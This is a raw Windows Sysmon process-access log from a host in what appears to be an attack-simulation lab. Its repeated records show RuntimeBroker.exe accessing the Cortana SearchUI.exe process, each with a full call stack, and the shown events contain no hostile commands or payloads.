13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11417|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 